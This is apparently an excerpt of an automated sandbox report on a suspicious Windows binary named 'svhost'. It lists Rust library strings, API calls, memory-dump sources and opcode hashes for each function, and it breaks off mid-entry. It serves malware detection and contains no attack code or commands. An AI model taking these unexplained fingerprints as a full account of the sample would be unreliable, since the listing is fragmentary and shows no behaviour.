                                • Instruction Fuzzy Hash: E3427B13B1A7E485E7959F796118AFA7F58D716790F8B9362DEE8037C2CA2CC244C321
                                Function 00007FF7AF69CF60 Relevance: 10.6, APIs: 7, Instructions: 86filenativeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CompletionCreateFile$ErrorModesNotificationPortStatus
                                • String ID:
                                • API String ID: 986160054-0
                                • Opcode ID: 1fabdfadfc432072246a59ddecb5ff5d27dc67ec124f9086ec080e71b85a3a42
                                • Instruction ID: eafb41bf49d04d6dd3d1f5329b6d84edc0d4c5340364d768f3f9ff22492c0d59
                                • Opcode Fuzzy Hash: 1fabdfadfc432072246a59ddecb5ff5d27dc67ec124f9086ec080e71b85a3a42
                                • Instruction Fuzzy Hash: 3941A432605B818AE7109F74E4843E9B7B5FB48368F915235EA9D47BA8DF7DD084C390
                                Function 00007FF7AF5B66C0 Relevance: 9.5, Strings: 7, Instructions: 750COMMON
                                Download Yara Rule
                                Strings
                                • FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.27\src\proto\h1\io.rs, xrefs: 00007FF7AF5B74C6, 00007FF7AF5B78B2, 00007FF7AF5B78CA, 00007FF7AF5B78F4, 00007FF7AF5B7928
                                • Out of bounds access, xrefs: 00007FF7AF5B7715
                                • assertion failed: cnt <= self.limit, xrefs: 00007FF7AF5B7765
                                • assertion failed: buf.len() <= c::ULONG::MAX as usize/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\sys\pal\windows\io.rs, xrefs: 00007FF7AF5B76FD
                                • assertion failed: buf.len() <= c::ULONG::MAX as usize/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\sys\pal\windows\io.rs, xrefs: 00007FF7AF5B789A
                                • header map at capacityC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\http-0.2.9\src\header\map.rs, xrefs: 00007FF7AF5B6976
                                • assertion failed: buf.len() <= c::ULONG::MAX as usize/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\sys\pal\windows\io.rs, xrefs: 00007FF7AF5B772D
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.27\src\proto\h1\io.rs$Out of bounds access$assertion failed: buf.len() <= c::ULONG::MAX as usize/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\sys\pal\windows\io.rs$assertion failed: buf.len() <= c::ULONG::MAX as usize/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\sys\pal\windows\io.rs$assertion failed: buf.len() <= c::ULONG::MAX as usize/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\sys\pal\windows\io.rs$assertion failed: cnt <= self.limit$header map at capacityC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\http-0.2.9\src\header\map.rs
                                • API String ID: 0-4194435152
                                • Opcode ID: 5ca77d499e99fa628e0bde3be867f452f23822881847b6a7b8b505c54404a49b
                                • Instruction ID: c5d3f6208c1f0eaabb2cae9c12e540b02d250bc3ee8c39679b1fb1fe17f3a8d5
                                • Opcode Fuzzy Hash: 5ca77d499e99fa628e0bde3be867f452f23822881847b6a7b8b505c54404a49b
                                • Instruction Fuzzy Hash: 70825E36A0ABC285EB60EB15F4403EAB3A5FB88784F954136DA8D47B69EF3CD145C710
                                Function 00007FF7AF6C6400 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 405COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Total CPUIntel x86MIPSRISC AlphaPPCSHXARMIntel Itanium-based x64RISC Alpha x64MSIL(Intel or AMD) x64Intel Itanium-based x86unknownARM x64C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.29.7\src\windows\cpu.rs, xrefs: 00007FF7AF6C648B
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: DrivesGlobalInfoLogicalMemoryPerformanceStatus
                                • String ID: Total CPUIntel x86MIPSRISC AlphaPPCSHXARMIntel Itanium-based x64RISC Alpha x64MSIL(Intel or AMD) x64Intel Itanium-based x86unknownARM x64C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.29.7\src\windows\cpu.rs
                                • API String ID: 2044637552-2007033887
                                • Opcode ID: 7962d73f58d74f9135c36c0127bd983157fc8e56162ae5c500b2e8b5c0f6fa57
                                • Instruction ID: 1da2e08d753cb0cd9db2ae2c539684cf3f5027818bb367d586167669de656d76
                                • Opcode Fuzzy Hash: 7962d73f58d74f9135c36c0127bd983157fc8e56162ae5c500b2e8b5c0f6fa57
                                • Instruction Fuzzy Hash: E6229032A09BC589F7719F34D8453F873A5FB5834CF859235DA8C0AAAADF399295C310
                                Function 00007FF7AF67A5A0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 278COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,-000000C8,00000000,?,?,?,?,00007FF7AF67E7CA), ref: 00007FF7AF67A5E4
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,-000000C8,00000000,?,?,?,?,00007FF7AF67E7CA), ref: 00007FF7AF67A665
                                Strings
                                • A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.C:\Users\Administrator\.cargo\registry\sr, xrefs: 00007FF7AF67A95A, 00007FF7AF67A978, 00007FF7AF67A996, 00007FF7AF67A9B4
                                • A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.29.1\src\runtime\scheduler\defer.rs, xrefs: 00007FF7AF67A93E
                                • assertion failed: !handle.is_shutdown(), xrefs: 00007FF7AF67A921
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.C:\Users\Administrator\.cargo\registry\sr$A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.29.1\src\runtime\scheduler\defer.rs$assertion failed: !handle.is_shutdown()
                                • API String ID: 17069307-1094005569
                                • Opcode ID: c9a8841e59b8b7e65afc6ac0d66609068f5bc7b3c104f6449754008c83e12087
                                • Instruction ID: 5f97c3b8675908d44b4fabf376f204b411e89969c760b6e8c8c330fdc1bd8388
                                • Opcode Fuzzy Hash: c9a8841e59b8b7e65afc6ac0d66609068f5bc7b3c104f6449754008c83e12087
                                • Instruction Fuzzy Hash: 66C1F212F0E6C299FB14EB6594013FDA7A6AB45358FC19136CE5E027F6CE3C9085C761
                                Function 00007FF7AF6FA720 Relevance: 6.1, APIs: 4, Instructions: 113filenativesynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ConditionErrorFileObjectSingleSleepStatusVariableWaitWrite
                                • String ID:
                                • API String ID: 2566848497-0
                                • Opcode ID: b1e76e82615e5611e50b73cdceb60d959fabec0f3061c433640a1d9a2776c1f8
                                • Instruction ID: f438d932018aabb9e3a9a9dfe25c39852c16e8037ad19d85f72acdf026c0dc46
                                • Opcode Fuzzy Hash: b1e76e82615e5611e50b73cdceb60d959fabec0f3061c433640a1d9a2776c1f8
                                • Instruction Fuzzy Hash: C841A936B19BC182EB249B25F44079AE3A6EB94390F919231E69D47BA4DF3CD0858B00
                                Function 00007FF7AF72A64C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                • String ID:
                                • API String ID: 2933794660-0
                                • Opcode ID: c44fcc3ffda19e4cbe18a501ecd10d1d1f9c064601c3cc38afff2db9f0b242c2
                                • Instruction ID: b856314ff1073fbd84fbbf2fc6e2d6ac8bd105a8fea35708b4f409fc616d56dd
                                • Opcode Fuzzy Hash: c44fcc3ffda19e4cbe18a501ecd10d1d1f9c064601c3cc38afff2db9f0b242c2
                                • Instruction Fuzzy Hash: 87115A36B15F418AEB00EF60E8442B873A4FB59B58F850E35DA6D837A4EF78D1A48350
                                Function 00007FF7AF68FE10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • RNG seed generator is internally corruptC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.29.1\src\util\rand\rt.rs, xrefs: 00007FF7AF68FEE0
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: RNG seed generator is internally corruptC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.29.1\src\util\rand\rt.rs
                                • API String ID: 17069307-3586186717
                                • Opcode ID: 4fafa320fe2348398f14ebd33f60354fae85078b24344f3b16d5dfc7d970b4a8
                                • Instruction ID: 4363f8b1034d8572ba09c77abcd25049008b5f78aa372fb734556d015434638c
                                • Opcode Fuzzy Hash: 4fafa320fe2348398f14ebd33f60354fae85078b24344f3b16d5dfc7d970b4a8
                                • Instruction Fuzzy Hash: EA21FC25B097C257FB28AF65A4400F9A791BB88354B85453DDEAE137E1DE3CE4168360
                                Function 00007FF7AF6F9210 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74filenativeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID: 0
                                • API String ID: 823142352-4108050209
                                • Opcode ID: 449715e0e002186222311268b51a934244acb7b46a95908f7b727c166a4922fe
                                • Instruction ID: 49efa7a38e0f21b2241061bd9177d42e76e9efcbe42a194dee17f4b1ea850f3a
                                • Opcode Fuzzy Hash: 449715e0e002186222311268b51a934244acb7b46a95908f7b727c166a4922fe
                                • Instruction Fuzzy Hash: 7D31C67290D6C186E7209F51E8407ABF7A2FB84784F915135DA8D47BA4DF3DD089CB50
                                Function 00007FF7AF573080 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: arenegyl$modnarod$setybdet$uespemos
                                • API String ID: 0-66988881
                                • Opcode ID: fe946fc675989f700fb0004023c3eda354f3d8c0727599ab71cd39a0997ae3a0
                                • Instruction ID: 7bdebf8f80825c760aef0ac09eabf1aa3cb03af735fae02a8b600ca991cb83d0
                                • Opcode Fuzzy Hash: fe946fc675989f700fb0004023c3eda354f3d8c0727599ab71cd39a0997ae3a0
                                • Instruction Fuzzy Hash: 2331D353F5166603FDE07FA67A227A76C416B917D0FCDA835DC0C9A352E83EEA438210
                                Function 00007FF7AF666A30 Relevance: 5.1, Strings: 4, Instructions: 91COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: arenegyl$modnarod$setybdet$uespemos
                                • API String ID: 0-66988881
                                • Opcode ID: 065c430e89b7e448f8c00fccdfd328a72d635704c51374afd71c0a3aad5b1969
                                • Instruction ID: 06b4daa83c42a22b87551ca5d0a1981d939ae03c7f8f69c661bcba2c639b0194
                                • Opcode Fuzzy Hash: 065c430e89b7e448f8c00fccdfd328a72d635704c51374afd71c0a3aad5b1969
                                • Instruction Fuzzy Hash: B121B8E5B58F8042FE80EBE5787636BA262A3457C0F40E036EE4D5770ADF3DD1528644
                                Function 00007FF7AF690FB0 Relevance: 5.1, Strings: 4, Instructions: 86COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: arenegyl$modnarod$setybdet$uespemos
                                • API String ID: 0-66988881
                                • Opcode ID: 3d3a167a0bde45cad399c9b65f5ec7074742ebcb749586335ffb650455f354a1
                                • Instruction ID: 69256bb6748315582142360d54a2322ca750be2c705ae768381c9ad5a58d1034
                                • Opcode Fuzzy Hash: 3d3a167a0bde45cad399c9b65f5ec7074742ebcb749586335ffb650455f354a1
                                • Instruction Fuzzy Hash: 232192E5F46B8002FE84F7E569763BA90629B427C0F80E436CD0DA774ADE2D92534141
                                Function 00007FF7AF56B100 Relevance: 4.6, Strings: 2, Instructions: 2077COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0$FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.27\src\proto\h1\dispatch.rs
                                • API String ID: 0-944630177
                                • Opcode ID: d84905cd7434c008e81fc8f4d1a00c1afb1e22fa281fee89ed5a1445dc952aa2
                                • Instruction ID: 9c30009e0c629dd243f175281150a5f7cb020a07dd316f0b0146d7f5d32a95a2
                                • Opcode Fuzzy Hash: d84905cd7434c008e81fc8f4d1a00c1afb1e22fa281fee89ed5a1445dc952aa2
                                • Instruction Fuzzy Hash: 5243822290AFC188EBB5AF24DC403E973A0FB4574DF895135CA9C4B7A5EF79A285C311
                                Function 00007FF7AF5767D0 Relevance: 4.3, Strings: 3, Instructions: 504COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.20\src\proto\streams\prioritize.rs$invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.8\src\lib.rs$wasn't expecting a frame to reclaim
                                • API String ID: 0-2894619141
                                • Opcode ID: 54e0d410056f98982e7d10a7f982c777b813328340ccd2b4ce0eefda9c33fc4a
                                • Instruction ID: 065cb69f9b75201e992baebb4422ae6cc114a12614dba7eec71e94f368453c04
                                • Opcode Fuzzy Hash: 54e0d410056f98982e7d10a7f982c777b813328340ccd2b4ce0eefda9c33fc4a
                                • Instruction Fuzzy Hash: 2F429136A0ABC189E772EF24D8443E873A5FF45748F854536CA4C0BAA9DF399785C320
                                Function 00007FF7AF719CA0 Relevance: 4.1, Strings: 3, Instructions: 378COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0$00000000$attempt to divide by zero
                                • API String ID: 0-3383565
                                • Opcode ID: 273f63c6d5a7854397b2b13919576e6600ff781752fcc5ede8d5aeeb79d44668
                                • Instruction ID: cab15dfa1d01a00ade464888efb4e3f6e696d12d9041bfe75de2c7306d70ad69
                                • Opcode Fuzzy Hash: 273f63c6d5a7854397b2b13919576e6600ff781752fcc5ede8d5aeeb79d44668
                                • Instruction Fuzzy Hash: 5CD16F65B0EAC242F735D615B4007FAE6A5ABD9380FC58232D94D07BF4EE3CD58A8718
                                Function 00007FF7AF73A710 Relevance: 4.0, Strings: 3, Instructions: 294COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Authenti$GenuineI$HygonGen
                                • API String ID: 0-696657513
                                • Opcode ID: d11a980e8153ee1c52d50af29fcc11634c3d99613cc726f3a56bf85857482214
                                • Instruction ID: d69136a79b6d7bae284ea6cbffdfc924aa6d7977c50b762bedd48f61a6f3dc4e
                                • Opcode Fuzzy Hash: d11a980e8153ee1c52d50af29fcc11634c3d99613cc726f3a56bf85857482214
                                • Instruction Fuzzy Hash: B391CAA7B35A9102FB588A66BD12BE59C81A35CBC4F457138ED9FA7B80D87CDE11C340
                                Function 00007FF7AF6BCFF0 Relevance: 3.1, Strings: 2, Instructions: 639COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                • API String ID: 0-2410210661
                                • Opcode ID: b6d052be238231dbfdcc2d57aabc4038e00a37c47637f557c091d89e9be32919
                                • Instruction ID: 664e703340db9c18075623420768119d9e78ea36a0c3be1dc63efb0cacd494e8
                                • Opcode Fuzzy Hash: b6d052be238231dbfdcc2d57aabc4038e00a37c47637f557c091d89e9be32919
